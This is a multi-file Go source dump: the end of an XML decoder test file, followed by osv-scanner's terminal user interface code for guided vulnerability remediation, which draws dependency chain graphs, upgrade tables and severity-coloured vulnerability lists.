`), `invalid sequence `), `invalid baz`), `element in space zzz closed by in space ""`}, {withDefaultHeader("\xf1"), `invalid UTF-8`}, // Header-related errors. {``, `unsupported version "1.1"; only version 1.0 is supported`}, // Cases below are for "no errors". {withDefaultHeader(``), ``}, {withDefaultHeader(``), ``}, } for _, test := range tests { d := NewDecoder(strings.NewReader(test.src)) var err error for { _, err = d.Token() if err != nil { break } } if test.err == "" { if err != io.EOF { t.Errorf("parse %s: have %q error, expected none", test.src, err) } continue } // Inv: err != nil if err == io.EOF { t.Errorf("parse %s: unexpected EOF", test.src) continue } if !strings.Contains(err.Error(), test.err) { t.Errorf("parse %s: can't find %q error substring\nerror: %q", test.src, test.err, err) continue } } } const testInputHTMLAutoClose = `












abc

` func BenchmarkHTMLAutoClose(b *testing.B) { b.RunParallel(func(p *testing.PB) { for p.Next() { d := NewDecoder(strings.NewReader(testInputHTMLAutoClose)) d.Strict = false d.AutoClose = HTMLAutoClose d.Entity = HTMLEntity for { _, err := d.Token() if err != nil { if err == io.EOF { break } b.Fatalf("unexpected error: %v", err) } } } }) } func TestHTMLAutoClose(t *testing.T) { wantTokens := []Token{ ProcInst{"xml", []byte(`version="1.0" encoding="UTF-8"`)}, CharData{data: []byte("\n")}, StartElement{Name{"", "br"}, []Attr{}, false, ""}, EndElement{Name{"", "br"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "br"}, []Attr{}, true, ""}, EndElement{Name{"", "br"}, true}, StartElement{Name{"", "br"}, []Attr{}, true, ""}, EndElement{Name{"", "br"}, true}, CharData{data: []byte("\n")}, StartElement{Name{"", "br"}, []Attr{}, false, ""}, EndElement{Name{"", "br"}, false}, StartElement{Name{"", "br"}, []Attr{}, false, ""}, EndElement{Name{"", "br"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "br"}, []Attr{}, false, ""}, EndElement{Name{"", "br"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "BR"}, []Attr{}, false, ""}, EndElement{Name{"", "BR"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "BR"}, []Attr{}, true, ""}, EndElement{Name{"", "BR"}, true}, StartElement{Name{"", "BR"}, []Attr{}, true, ""}, EndElement{Name{"", "BR"}, true}, CharData{data: []byte("\n")}, StartElement{Name{"", "Br"}, []Attr{}, false, ""}, EndElement{Name{"", "Br"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "BR"}, []Attr{}, false, ""}, EndElement{Name{"", "BR"}, false}, StartElement{Name{"", "span"}, []Attr{{Name: Name{"", "id"}, Value: "test"}}, false, ""}, CharData{data: []byte("abc")}, EndElement{Name{"", "span"}, false}, StartElement{Name{"", "br"}, []Attr{}, true, ""}, EndElement{Name{"", "br"}, true}, StartElement{Name{"", "br"}, []Attr{}, true, ""}, EndElement{Name{"", "br"}, true}, } d := NewDecoder(strings.NewReader(testInputHTMLAutoClose)) d.Strict = false d.AutoClose = HTMLAutoClose d.Entity = HTMLEntity var haveTokens []Token for { tok, err := d.Token() if err != nil { if err == io.EOF { break } t.Fatalf("unexpected error: %v", err) } haveTokens = append(haveTokens, CopyToken(tok)) } if len(haveTokens) != len(wantTokens) { t.Errorf("tokens count mismatch: have %d, want %d", len(haveTokens), len(wantTokens)) } for i, want := range wantTokens { if i >= len(haveTokens) { t.Errorf("token[%d] expected %#v, have no token", i, want) } else { have := haveTokens[i] if !reflect.DeepEqual(have, want) { t.Errorf("token[%d] mismatch:\nhave: %#v\nwant: %#v", i, have, want) } } } } ================================================ FILE: internal/tui/dependency-graph.go ================================================ package tui import ( "fmt" "slices" "strings" "charm.land/lipgloss/v2" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/resolution" ) type chainGraphNode struct { vk resolve.VersionKey isDirect bool // if this is a direct dependency dependents []*chainGraphNode // in this representation, the dependents are the children of this node // so the root of the tree is rendered at the bottom } type ChainGraph struct { *chainGraphNode } func subgraphEdges(sg *resolution.DependencySubgraph, direct resolve.NodeID) []resolve.Edge { // find the shortest chain of edges from direct to the vulnerable node, excluding the root->direct edge. // return them in reverse order, with edges[0].To = sg.Dependency edges := make([]resolve.Edge, 0, sg.Nodes[0].Distance-1) nID := direct for nID != sg.Dependency { n := sg.Nodes[nID] idx := slices.IndexFunc(n.Children, func(e resolve.Edge) bool { return sg.Nodes[e.To].Distance == n.Distance-1 }) if idx < 0 { break } edge := n.Children[idx] edges = append(edges, edge) nID = edge.To } slices.Reverse(edges) return edges } // FindChainGraphs constructs a graph of the shortest paths from each direct dependency to each unique vulnerable node func FindChainGraphs(subgraphs []*resolution.DependencySubgraph) []ChainGraph { // Construct the ChainGraphs ret := make([]ChainGraph, 0, len(subgraphs)) for _, sg := range subgraphs { nodes := make(map[resolve.NodeID]*chainGraphNode) isDirect := func(nID resolve.NodeID) bool { return slices.ContainsFunc(sg.Nodes[nID].Parents, func(e resolve.Edge) bool { return e.From == 0 }) } // Create and add the vulnerable node to the returned graphs n := &chainGraphNode{ vk: sg.Nodes[sg.Dependency].Version, dependents: nil, isDirect: isDirect(sg.Dependency), } ret = append(ret, ChainGraph{n}) nodes[sg.Dependency] = n for _, startEdge := range sg.Nodes[0].Children { // Going up the chain, add the node to the previous' children if it's not there already for _, e := range subgraphEdges(sg, startEdge.To) { p := nodes[e.To] n, ok := nodes[e.From] if !ok { n = &chainGraphNode{ vk: sg.Nodes[e.From].Version, dependents: nil, isDirect: isDirect(e.From), } nodes[e.From] = n } if !slices.Contains(p.dependents, n) { p.dependents = append(p.dependents, n) } } } } return ret } func (c ChainGraph) String() string { if c.chainGraphNode == nil { return "" } s, _ := c.subString(true) // Fill in the missing whitespace w := lipgloss.Width(s) h := lipgloss.Height(s) // need to use w+1 to force lipgloss to place whitespace return lipgloss.Place(w+1, h, lipgloss.Left, lipgloss.Top, s) } var ( directNodeStyle = lipgloss.NewStyle().Bold(true).Foreground(lipgloss.Color("12")).Margin(0, 1) // blue text vulnNodeStyle = lipgloss.NewStyle().Bold(true).Foreground(lipgloss.Color("15")).Background(lipgloss.Color("1")).Padding(0, 1) // white on red background directVulnNodeStyle = lipgloss.NewStyle().Bold(true).Foreground(lipgloss.Color("15")).Background(lipgloss.Color("5")).Padding(0, 1) // white on purple background ) // recursive construction of the visualized tree // returns the subtree and the offset for where a child should connect to this func (c *chainGraphNode) subString(isVuln bool) (string, int) { nodeStr := fmt.Sprintf("%s@%s", c.vk.Name, c.vk.Version) switch { case isVuln && c.isDirect: nodeStr = directVulnNodeStyle.Render(nodeStr) case isVuln: nodeStr = vulnNodeStyle.Render(nodeStr) case c.isDirect: nodeStr = directNodeStyle.Render(nodeStr) } nodeOffset := lipgloss.Width(nodeStr) / 2 // No children, just show the text if len(c.dependents) == 0 { return nodeStr, nodeOffset } // one child, add a single line connecting this to the child above it if len(c.dependents) == 1 { childStr, childCenter := c.dependents[0].subString(false) if nodeOffset > childCenter { // left-pad the child if the parent is wider childStr = lipgloss.JoinHorizontal(lipgloss.Bottom, strings.Repeat(" ", nodeOffset-childCenter), childStr) childCenter = nodeOffset } nodeStr = strings.Repeat(" ", childCenter-nodeOffset) + nodeStr joinerStr := strings.Repeat(" ", childCenter) + "│" return fmt.Sprintf("%s\n%s\n%s", childStr, joinerStr, nodeStr), childCenter } // multiple children: // Join the children together on one line nChilds := len(c.dependents) paddedChildStrings := make([]string, 0, 2*nChilds) // string of children, with padding strings in between childOffsets := make([]int, 0, nChilds) // where above the children to connect the lines to them width := 0 for _, ch := range c.dependents { str, off := ch.subString(false) paddedChildStrings = append(paddedChildStrings, str, " ") childOffsets = append(childOffsets, width+off) width += lipgloss.Width(str) + 1 } joinedChildren := lipgloss.JoinHorizontal(lipgloss.Bottom, paddedChildStrings...) // create the connecting line // connector bits: ┌ ─ ┼ ┐ ┬ ┴ ┘ └ firstOffset := childOffsets[0] lastOffset := childOffsets[nChilds-1] var midOffset int // where on the line to connect the parent if nChilds%2 == 0 { // if there's an even number of children, connect between the middle two midOffset = (childOffsets[nChilds/2-1] + childOffsets[nChilds/2]) / 2 } else { // otherwise, connect inline with the middle child midOffset = childOffsets[nChilds/2] } line := make([]rune, lastOffset+1) offsetIdx := 0 for i := range line { switch { case i < firstOffset: line[i] = ' ' case i == firstOffset: line[i] = '└' offsetIdx++ case i == lastOffset: line[i] = '┘' offsetIdx++ case i == midOffset: if i == childOffsets[offsetIdx] { line[i] = '┼' offsetIdx++ } else { line[i] = '┬' } case i == childOffsets[offsetIdx]: line[i] = '┴' offsetIdx++ default: line[i] = '─' } } // join everything together linedChildren := fmt.Sprintf("%s\n%s", joinedChildren, string(line)) if nodeOffset > midOffset { // left-pad the children if the parent is wider linedChildren = lipgloss.JoinHorizontal(lipgloss.Bottom, strings.Repeat(" ", nodeOffset-midOffset), linedChildren) midOffset = nodeOffset } nodeStr = strings.Repeat(" ", midOffset-nodeOffset) + nodeStr return fmt.Sprintf("%s\n%s", linedChildren, nodeStr), midOffset } ================================================ FILE: internal/tui/in-place-info.go ================================================ package tui import ( "fmt" "charm.land/bubbles/v2/key" "charm.land/bubbles/v2/table" tea "charm.land/bubbletea/v2" "charm.land/lipgloss/v2" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" ) // A ViewModel showing the table of package upgrades and fixed vulnerabilities, for in-place upgrades. // Pressing 'enter' on a row shows the vulnerability details type inPlaceInfo struct { table.Model vulns []*resolution.Vulnerability currVulnInfo ViewModel width int height int } //revive:disable-next-line:unexported-return func NewInPlaceInfo(res remediation.InPlaceResult) *inPlaceInfo { info := inPlaceInfo{width: ViewMinWidth, height: ViewMinHeight} // placeholder dimensions cols := []table.Column{ {Title: "PACKAGE"}, {Title: "VERSION CHANGE"}, {Title: "FIXED VULN"}, } for i := range cols { cols[i].Width = lipgloss.Width(cols[i].Title) } rows := make([]table.Row, 0, len(res.Patches)) for _, patch := range res.Patches { // Make a new row for each vulnerability // I wanted to have this as one entry with multiple vulnerabilities, // but tables don't let you have multi-line rows. // Put the package name only on the first row row := table.Row{ patch.Pkg.Name, fmt.Sprintf("%s → %s", patch.OrigVersion, patch.NewVersion), patch.ResolvedVulns[0].OSV.GetId(), } // Set each column to their widest element for i, s := range row { if w := lipgloss.Width(s); w > cols[i].Width { cols[i].Width = w } } rows = append(rows, row) info.vulns = append(info.vulns, &patch.ResolvedVulns[0]) // use blank package name / bump for other vulns from same patch for i, v := range patch.ResolvedVulns[1:] { row := table.Row{ "", "", v.OSV.GetId(), } rows = append(rows, row) info.vulns = append(info.vulns, &patch.ResolvedVulns[i+1]) if w := lipgloss.Width(row[2]); w > cols[2].Width { cols[2].Width = w } } } // centre the version change strings cols[1].Title = lipgloss.PlaceHorizontal(cols[1].Width, lipgloss.Center, cols[1].Title) for _, row := range rows { row[1] = lipgloss.PlaceHorizontal(cols[1].Width, lipgloss.Center, row[1]) } st := table.DefaultStyles() st.Header = st.Header.Bold(false).BorderStyle(lipgloss.NormalBorder()).BorderBottom(true) st.Selected = st.Selected.Foreground(ColorPrimary) info.Model = table.New( table.WithColumns(cols), table.WithRows(rows), table.WithWidth(info.width), table.WithHeight(info.height), table.WithFocused(true), table.WithStyles(st), table.WithKeyMap(table.KeyMap{ LineUp: Keys.Up, LineDown: Keys.Down, PageUp: Keys.Left, PageDown: Keys.Right, }), ) return &info } func (ip *inPlaceInfo) Resize(w, h int) { ip.width = w ip.height = h ip.SetWidth(w) ip.SetHeight(h) if ip.currVulnInfo != nil { ip.currVulnInfo.Resize(w, h) } } func (ip *inPlaceInfo) Update(msg tea.Msg) (ViewModel, tea.Cmd) { var cmd tea.Cmd if ip.currVulnInfo != nil { ip.currVulnInfo, cmd = ip.currVulnInfo.Update(msg) return ip, cmd } if msg, ok := msg.(tea.KeyPressMsg); ok { switch { case key.Matches(msg, Keys.Quit): return ip, CloseViewModel case key.Matches(msg, Keys.Select): vuln := ip.vulns[ip.Cursor()] ip.currVulnInfo = NewVulnInfo(vuln) ip.currVulnInfo.Resize(ip.Width(), ip.Height()) return ip, nil } } ip.Model, cmd = ip.Model.Update(msg) return ip, cmd } func (ip *inPlaceInfo) View() string { if ip.currVulnInfo != nil { return ip.currVulnInfo.View() } // place the table in the centre of the view return lipgloss.Place(ip.width, ip.height, lipgloss.Center, lipgloss.Center, ip.Model.View()) } ================================================ FILE: internal/tui/relock-info.go ================================================ package tui import ( "fmt" "strings" "charm.land/bubbles/v2/key" tea "charm.land/bubbletea/v2" "charm.land/lipgloss/v2" "github.com/google/osv-scanner/v2/internal/resolution" ) // A ViewModel showing the dependency changes, the removed, and added vulnerabilities // resulting from a proposed relock patch type relockInfo struct { fixedHeight float64 fixedList *vulnList addedList *vulnList addedFocused bool } //revive:disable-next-line:unexported-return func NewRelockInfo(change resolution.Difference) *relockInfo { info := relockInfo{fixedHeight: 1} preamble := strings.Builder{} preamble.WriteString("The following upgrades:\n") for _, dep := range change.Deps { fmt.Fprintf(&preamble, " %s@%s (%s) → @%s (%s)\n", dep.Pkg.Name, dep.OrigRequire, dep.OrigResolved, dep.NewRequire, dep.NewResolved) } preamble.WriteString("Will resolve the following:") fixedVulns := make([]*resolution.Vulnerability, len(change.RemovedVulns)) for i := range change.RemovedVulns { fixedVulns[i] = &change.RemovedVulns[i] } info.fixedList = NewVulnList(fixedVulns, preamble.String()) if len(change.AddedVulns) == 0 { return &info } // Create a second list showing introduced vulns newVulns := make([]*resolution.Vulnerability, len(change.AddedVulns)) for i := range change.AddedVulns { newVulns[i] = &change.AddedVulns[i] } info.addedList = NewVulnList(newVulns, "But will introduce the following new vulns:") info.addedList.Blur() // divide two lists by roughly how many lines each would have const fixedMinHeight = 0.5 const fixedMaxHeight = 0.8 fixed := float64(len(change.Deps) + len(fixedVulns)) added := float64(len(newVulns)) info.fixedHeight = fixed / (fixed + added) if info.fixedHeight < fixedMinHeight { info.fixedHeight = fixedMinHeight } if info.fixedHeight > fixedMaxHeight { info.fixedHeight = fixedMaxHeight } return &info } func (r *relockInfo) Resize(w, h int) { fixedHeight := int(r.fixedHeight * float64(h)) r.fixedList.Resize(w, fixedHeight) if r.addedList != nil { r.addedList.Resize(w, h-fixedHeight) } } func (r *relockInfo) Update(msg tea.Msg) (ViewModel, tea.Cmd) { var cmds []tea.Cmd // check if we're trying to scroll past the end of one of the lists if msg, ok := msg.(tea.KeyPressMsg); ok && r.addedList != nil { // scrolling up out of the added list if r.addedFocused && r.addedList.Index() == 0 && key.Matches(msg, Keys.Up) { r.addedFocused = false r.addedList.Blur() r.fixedList.Focus() return r, nil } // scrolling down out of fixed list if !r.addedFocused && r.fixedList.Index() == len(r.fixedList.Items())-1 && key.Matches(msg, Keys.Down) { r.addedFocused = true r.addedList.Focus() r.fixedList.Blur() return r, nil } } // do normal updates l, cmd := r.fixedList.Update(msg) r.fixedList = l.(*vulnList) cmds = append(cmds, cmd) if r.addedList != nil { l, cmd := r.addedList.Update(msg) r.addedList = l.(*vulnList) cmds = append(cmds, cmd) } return r, tea.Batch(cmds...) } func (r *relockInfo) View() string { if r.addedList == nil || r.fixedList.currVulnInfo != nil { return r.fixedList.View() } if r.addedList.currVulnInfo != nil { return r.addedList.View() } return lipgloss.JoinVertical(lipgloss.Center, r.fixedList.View(), r.addedList.View()) } ================================================ FILE: internal/tui/severity.go ================================================ package tui import ( "fmt" "image/color" "charm.land/lipgloss/v2" "github.com/google/osv-scanner/v2/internal/utility/severity" "github.com/ossf/osv-schema/bindings/go/osvschema" ) var ( severityColor = map[string]color.Color{ "UNKNOWN": lipgloss.Color("243"), // grey "NONE": lipgloss.Color("243"), // grey "LOW": lipgloss.Color("28"), // green "MEDIUM": lipgloss.Color("208"), // orange "HIGH": lipgloss.Color("160"), // red "CRITICAL": lipgloss.Color("88"), // dark red } severityStyle = lipgloss.NewStyle(). Foreground(lipgloss.Color("15")). // white Bold(true). Align(lipgloss.Center) ) func RenderSeverity(severities []*osvschema.Severity) string { text := "UNKNOWN" score, rating, _ := severity.CalculateOverallScore(severities) if rating != "UNKNOWN" { text = fmt.Sprintf("%1.1f %s", score, rating) } return severityStyle.Width(16).Background(severityColor[rating]).Render(text) } func RenderSeverityShort(severities []*osvschema.Severity) string { score, rating, _ := severity.CalculateOverallScore(severities) scoreStr := fmt.Sprintf("%1.1f", score) if rating == "UNKNOWN" { scoreStr = "???" } return severityStyle.Width(5).Background(severityColor[rating]).Render(scoreStr) } ================================================ FILE: internal/tui/styles.go ================================================ package tui import ( "charm.land/lipgloss/v2" "charm.land/lipgloss/v2/compat" ) var ( ColorPrimary = lipgloss.Color("#e62129") // Red, from the OSV logo :) ColorDisabled = compat.AdaptiveColor{ // Grey Light: lipgloss.Color("250"), Dark: lipgloss.Color("238"), } ) var ( SelectedTextStyle = lipgloss.NewStyle().Foreground(ColorPrimary) DisabledTextStyle = lipgloss.NewStyle().Foreground(ColorDisabled) ) // View dimensions // width / height refers to the internal text area of the view // i.e. excluding the border and the padding const ( ViewMinHeight = 20 // the minimum internal height the view can be ViewVPad = 1 // the vertical padding of the view ViewMinWidth = 60 // the minimum internal width the view can be ViewWidthPct = 0.4 // percentage of terminal internal width the main view should occupy ViewHPad = 2 // the horizontal padding of the view ) ================================================ FILE: internal/tui/tui.go ================================================ // Package tui provides a terminal user interface for guided remediation. package tui import ( "fmt" "strings" "time" "charm.land/bubbles/v2/key" "charm.land/bubbles/v2/spinner" tea "charm.land/bubbletea/v2" "charm.land/lipgloss/v2" ) type KeyMap struct { Up key.Binding Down key.Binding Left key.Binding Right key.Binding Select key.Binding SwitchView key.Binding Help key.Binding Quit key.Binding } func (k KeyMap) ShortHelp() []key.Binding { return []key.Binding{k.Help, k.Quit} } func (k KeyMap) FullHelp() [][]key.Binding { return [][]key.Binding{ {k.Up, k.Down}, {k.Select, k.SwitchView}, {k.Help, k.Quit}, } } var Keys = KeyMap{ Up: key.NewBinding( key.WithKeys("up"), key.WithHelp("↑", "move up"), ), Down: key.NewBinding( key.WithKeys("down"), key.WithHelp("↓", "move down"), ), Left: key.NewBinding( key.WithKeys("left"), ), Right: key.NewBinding( key.WithKeys("right"), ), Select: key.NewBinding( key.WithKeys("enter"), key.WithHelp("enter", "select option"), ), SwitchView: key.NewBinding( key.WithKeys("tab", "i"), key.WithHelp("i/tab", "switch views"), ), Help: key.NewBinding( key.WithKeys("h"), key.WithHelp("h", "toggle help"), ), Quit: key.NewBinding( key.WithKeys("q", "esc"), key.WithHelp("q/esc", "exit"), ), } // NewSpinner creates a stylised spinner func NewSpinner() spinner.Model { sp := spinner.New(spinner.WithSpinner(spinner.Line)) // Spinner.FPS is actually the duration of each frame, not the frames per second sp.Spinner.FPS = 200 * time.Millisecond return sp } // RenderSelectorOption provides an inline selector renderer, for layouts that don't fit neatly into a list/table func RenderSelectorOption( selected bool, // whether this line is currently highlighted cursor string, // the cursor to display before the line, if it's selected format string, // format string for the content. Should only use `%v` specifier args ...any, // args for the format string. These will be highlighted if the line is selected ) string { if !selected { cursor = strings.Repeat(" ", lipgloss.Width(cursor)) } else { cursor = SelectedTextStyle.Render(cursor) for i := range args { args[i] = SelectedTextStyle.Render(fmt.Sprintf("%v", args[i])) } } return fmt.Sprintf(cursor+format, args...) } // ViewModel provides a tea-like model for representing the secondary info panel // which allows for resizing type ViewModel interface { Update(msg tea.Msg) (ViewModel, tea.Cmd) View() string Resize(w, h int) } // ViewModelCloseMsg provides a message to close the ViewModel type ViewModelCloseMsg struct{} var CloseViewModel tea.Cmd = func() tea.Msg { return ViewModelCloseMsg{} } ================================================ FILE: internal/tui/vuln-info.go ================================================ package tui import ( "fmt" "os" "strings" "charm.land/bubbles/v2/key" "charm.land/bubbles/v2/viewport" tea "charm.land/bubbletea/v2" "charm.land/glamour/v2" "charm.land/glamour/v2/ansi" "charm.land/glamour/v2/styles" "charm.land/lipgloss/v2" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/muesli/reflow/wordwrap" ) // ViewModel to display the details of a specific vulnerability type vulnInfo struct { vuln *resolution.Vulnerability chainGraphs []ChainGraph width int height int cursor int numDetailLines int // number of lines to show for details in the main view mdStyle ansi.StyleConfig // markdown styling for details viewport viewport.Model // used for scrolling onlyDetails & onlyGraphs views onlyDetails bool // if the details screen is open onlyGraphs bool // if the affected screen is open } var ( vulnInfoHeadingStyle = lipgloss.NewStyle(). Bold(true). Width(10). MarginRight(2). Foreground(ColorPrimary) highlightedVulnInfoHeadingStyle = vulnInfoHeadingStyle.Reverse(true) ) //revive:disable-next-line:unexported-return func NewVulnInfo(vuln *resolution.Vulnerability) *vulnInfo { v := vulnInfo{ vuln: vuln, width: ViewMinWidth, height: ViewMinHeight, cursor: 0, numDetailLines: 5, viewport: viewport.New(viewport.WithWidth(ViewMinWidth), viewport.WithHeight(20)), } v.viewport.KeyMap = viewport.KeyMap{ Up: Keys.Up, Down: Keys.Down, PageUp: Keys.Left, PageDown: Keys.Right, } // remove the padding/margins from the default markdown style if lipgloss.HasDarkBackground(os.Stdin, os.Stdout) { v.mdStyle = styles.DarkStyleConfig } else { v.mdStyle = styles.LightStyleConfig } *v.mdStyle.Document.Margin = 0 v.mdStyle.Document.BlockPrefix = "" v.chainGraphs = FindChainGraphs(vuln.Subgraphs) return &v } func (v *vulnInfo) Resize(w, h int) { v.width = w v.height = h v.viewport.SetWidth(w) v.viewport.SetHeight(h) if v.onlyDetails { v.viewport.SetContent(v.detailsOnlyView()) } } func (v *vulnInfo) Update(msg tea.Msg) (ViewModel, tea.Cmd) { if v.onlyDetails || v.onlyGraphs { if msg, ok := msg.(tea.KeyPressMsg); ok { if key.Matches(msg, Keys.Quit) { v.onlyDetails = false v.onlyGraphs = false return v, nil } } var cmd tea.Cmd v.viewport, cmd = v.viewport.Update(msg) return v, cmd } if msg, ok := msg.(tea.KeyPressMsg); ok { switch { case key.Matches(msg, Keys.Quit): return nil, nil case key.Matches(msg, Keys.Down): if v.cursor < 4 { v.cursor++ } case key.Matches(msg, Keys.Up): if v.cursor > 0 { v.cursor-- } case key.Matches(msg, Keys.Select): if v.cursor == 3 { v.onlyDetails = true v.viewport.SetContent(v.detailsOnlyView()) v.viewport.GotoTop() } if v.cursor == 4 { v.onlyGraphs = true v.viewport.SetContent(v.graphOnlyView()) v.viewport.GotoTop() } } } return v, nil } func (v *vulnInfo) View() string { if v.onlyDetails || v.onlyGraphs { return v.viewport.View() } detailWidth := v.width - (vulnInfoHeadingStyle.GetWidth() + vulnInfoHeadingStyle.GetMarginRight()) vID := v.vuln.OSV.GetId() sev := RenderSeverity(v.vuln.OSV.GetSeverity()) sum := wordwrap.String(v.vuln.OSV.GetSummary(), detailWidth) var det string r, err := glamour.NewTermRenderer( glamour.WithStyles(v.mdStyle), glamour.WithWordWrap(detailWidth), ) if err == nil { det, err = r.Render(v.vuln.OSV.GetDetails()) } if err != nil { det = v.fallbackDetails(detailWidth) } det = lipgloss.NewStyle().MaxHeight(v.numDetailLines).Render(det) s := strings.Builder{} s.WriteString(lipgloss.JoinHorizontal(lipgloss.Top, v.headingStyle(0).Render("ID:"), vID)) s.WriteString("\n") s.WriteString(lipgloss.JoinHorizontal(lipgloss.Top, v.headingStyle(1).Render("Severity:"), sev)) s.WriteString("\n") s.WriteString(lipgloss.JoinHorizontal(lipgloss.Top, v.headingStyle(2).Render("Summary:"), sum)) s.WriteString("\n") s.WriteString(lipgloss.JoinHorizontal(lipgloss.Top, v.headingStyle(3).Render("Details:"), det)) s.WriteString("\n") s.WriteString(v.headingStyle(4).Render("Affected:")) s.WriteString("\n") if len(v.chainGraphs) == 0 { s.WriteString("ERROR: could not resolve any affected paths\n") return s.String() } s.WriteString(lipgloss.NewStyle().MaxWidth(v.width).Render(v.chainGraphs[0].String())) s.WriteString("\n") if len(v.chainGraphs) > 1 { s.WriteString(DisabledTextStyle.Render(fmt.Sprintf("+%d other paths", len(v.chainGraphs)-1))) s.WriteString("\n") } return s.String() } func (v *vulnInfo) detailsOnlyView() string { s := strings.Builder{} s.WriteString(vulnInfoHeadingStyle.Render("Details:")) s.WriteString("\n") var det string r, err := glamour.NewTermRenderer( glamour.WithStyles(v.mdStyle), glamour.WithWordWrap(v.width), ) if err == nil { det, err = r.Render(v.vuln.OSV.GetDetails()) } if err != nil { det = v.fallbackDetails(v.width) } s.WriteString(det) return s.String() } func (v *vulnInfo) graphOnlyView() string { // TODO: some graphs still get clipped on the right side // need horizontal scrolling, but that's not supported by the bubbles viewport // and it's difficult to implement s := strings.Builder{} s.WriteString(vulnInfoHeadingStyle.Render("Affected:")) strs := make([]string, 0, 2*len(v.chainGraphs)) // 2x to include padding newlines between graphs for _, g := range v.chainGraphs { strs = append(strs, "\n", g.String()) } s.WriteString(lipgloss.JoinVertical(lipgloss.Center, strs...)) return s.String() } func (v *vulnInfo) headingStyle(idx int) lipgloss.Style { if idx == v.cursor { return highlightedVulnInfoHeadingStyle } return vulnInfoHeadingStyle } func (v *vulnInfo) fallbackDetails(width int) string { // Use raw details if markdown rendering fails for whatever reason return wordwrap.String(v.vuln.OSV.GetDetails(), width) } ================================================ FILE: internal/tui/vuln-list.go ================================================ package tui import ( "cmp" "fmt" "io" "slices" "charm.land/bubbles/v2/key" "charm.land/bubbles/v2/list" tea "charm.land/bubbletea/v2" "charm.land/lipgloss/v2" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/utility/severity" "github.com/muesli/reflow/truncate" ) // A ViewModel list of vulnerabilities, // selectable to show details type vulnList struct { // There is a table model that could be used for this instead, // but there is much less control over the styling of the cells list.Model preamble string // text to write above vuln list currVulnInfo ViewModel // selected vulnerability delegate list.ItemDelegate // default item renderer blurred bool // whether the cursor should be hidden and input disabled } //revive:disable-next-line:unexported-return func NewVulnList(vulns []*resolution.Vulnerability, preamble string) *vulnList { vl := vulnList{preamble: preamble} // Sort the vulns by descending severity, then ID vulns = slices.Clone(vulns) slices.SortFunc(vulns, func(a, b *resolution.Vulnerability) int { aScoreFloat, aRating, _ := severity.CalculateOverallScore(a.OSV.GetSeverity()) aScore := int(aScoreFloat * 10) // CVSS scores are only to 1dp if aRating == "UNKNOWN" { aScore = 999 // Sort unknown before critical } bScoreFloat, bRating, _ := severity.CalculateOverallScore(b.OSV.GetSeverity()) bScore := int(bScoreFloat * 10) // CVSS scores are only to 1dp if bRating == "UNKNOWN" { bScore = 999 // Sort unknown before critical } if c := cmp.Compare(aScore, bScore); c != 0 { return -c } return cmp.Compare(a.OSV.GetId(), b.OSV.GetId()) }) items := make([]list.Item, 0, len(vulns)) delegate := vulnListItemDelegate{idWidth: 0} for _, v := range vulns { items = append(items, vulnListItem{v}) if w := lipgloss.Width(v.OSV.GetId()); w > delegate.idWidth { delegate.idWidth = w } } l := list.New(items, delegate, ViewMinWidth, ViewMinHeight-vl.preambleHeight()) l.SetFilteringEnabled(false) l.SetShowStatusBar(false) l.SetShowHelp(false) l.DisableQuitKeybindings() l.KeyMap = list.KeyMap{ CursorUp: Keys.Up, CursorDown: Keys.Down, NextPage: Keys.Right, PrevPage: Keys.Left, } l.Styles.TitleBar = lipgloss.NewStyle().PaddingLeft(2).Width(ViewMinWidth).BorderStyle(lipgloss.NormalBorder()).BorderBottom(true) l.Styles.Title = lipgloss.NewStyle() l.Title = fmt.Sprintf("%s %s %s", lipgloss.NewStyle().Width(delegate.idWidth).Render("VULN ID"), " SEV ", // intentional spacing, scores always 5 wide "SUMMARY", ) vl.Model = l vl.delegate = delegate return &vl } func (v *vulnList) preambleHeight() int { if len(v.preamble) == 0 { return 0 } return lipgloss.Height(v.preamble) } func (v *vulnList) Resize(w, h int) { v.SetWidth(w) v.SetHeight(h - v.preambleHeight()) v.Styles.TitleBar = v.Styles.TitleBar.Width(w) if v.currVulnInfo != nil { v.currVulnInfo.Resize(w, h) } } func (v *vulnList) Update(msg tea.Msg) (ViewModel, tea.Cmd) { if v.blurred { return v, nil } var cmd tea.Cmd if v.currVulnInfo != nil { v.currVulnInfo, cmd = v.currVulnInfo.Update(msg) return v, cmd } if msg, ok := msg.(tea.KeyPressMsg); ok { switch { case key.Matches(msg, Keys.Quit): return v, CloseViewModel case key.Matches(msg, Keys.Select): vuln := v.SelectedItem().(vulnListItem) v.currVulnInfo = NewVulnInfo(vuln.Vulnerability) v.currVulnInfo.Resize(v.Width(), v.Height()) return v, nil } } if v.currVulnInfo == nil { v.Model, cmd = v.Model.Update(msg) } return v, cmd } func (v *vulnList) View() string { if v.currVulnInfo != nil { return v.currVulnInfo.View() } str := v.Model.View() if len(v.preamble) > 0 { str = lipgloss.JoinVertical(lipgloss.Left, v.preamble, str) } return str } func (v *vulnList) Blur() { v.blurred = true v.SetDelegate(blurredDelegate{v.delegate}) } func (v *vulnList) Focus() { v.blurred = false v.SetDelegate(v.delegate) } // Helpers for the list.Model type vulnListItem struct { *resolution.Vulnerability } func (v vulnListItem) FilterValue() string { return v.OSV.GetId() } type vulnListItemDelegate struct { idWidth int } func (d vulnListItemDelegate) Height() int { return 1 } func (d vulnListItemDelegate) Spacing() int { return 0 } func (d vulnListItemDelegate) Update(tea.Msg, *list.Model) tea.Cmd { return nil } func (d vulnListItemDelegate) Render(w io.Writer, m list.Model, index int, listItem list.Item) { vuln, ok := listItem.(vulnListItem) if !ok { return } cursor := " " idStyle := lipgloss.NewStyle().Width(d.idWidth).Align(lipgloss.Left) if index == m.Index() { cursor = SelectedTextStyle.Render(">") idStyle = idStyle.Inherit(SelectedTextStyle) } id := idStyle.Render(vuln.OSV.GetId()) sev := RenderSeverityShort(vuln.OSV.GetSeverity()) str := fmt.Sprintf("%s %s %s ", cursor, id, sev) fmt.Fprint(w, str) fmt.Fprint(w, truncate.StringWithTail(vuln.OSV.GetSummary(), uint(m.Width()-lipgloss.Width(str)), "…")) //nolint:gosec } // 